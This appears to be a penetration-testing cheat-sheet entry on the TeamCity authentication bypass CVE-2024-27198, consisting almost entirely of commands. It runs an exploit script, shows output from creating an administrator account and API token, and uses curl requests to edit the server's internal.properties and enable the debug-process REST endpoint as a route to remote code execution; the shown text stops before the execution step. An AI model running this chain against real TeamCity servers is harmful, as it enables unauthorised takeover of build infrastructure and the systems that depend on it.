TeamCity
Authentication Bypass
python3 CVE-2024-27198.py -t http://tc-instance -u x7331 -p Password123!RCE
# Create an admin user
$ uv run exploit.py -u http://tc-instance --add-user
[+] User created successfully. Username: xbxb4t78, ID: 22, Password: mEwy3Dn5Ic
[+] Token created successfully for user ID: 22. Token Name: dWzcfCVd61, Token: ey...Fj
# If already exists delete it and get it after
$ curl -X DELETE http://tc-instance/app/rest/users/id:22/tokens/RPC2
# Save the token
$ export TOKEN="ey...Fj"
# Enable the debug mode
$ curl -X POST 'http://tc-instance/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"
# Refresh the server
$ curl 'http://tc-instance/admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties' -H "Authorization: Bearer $TOKEN"Last updated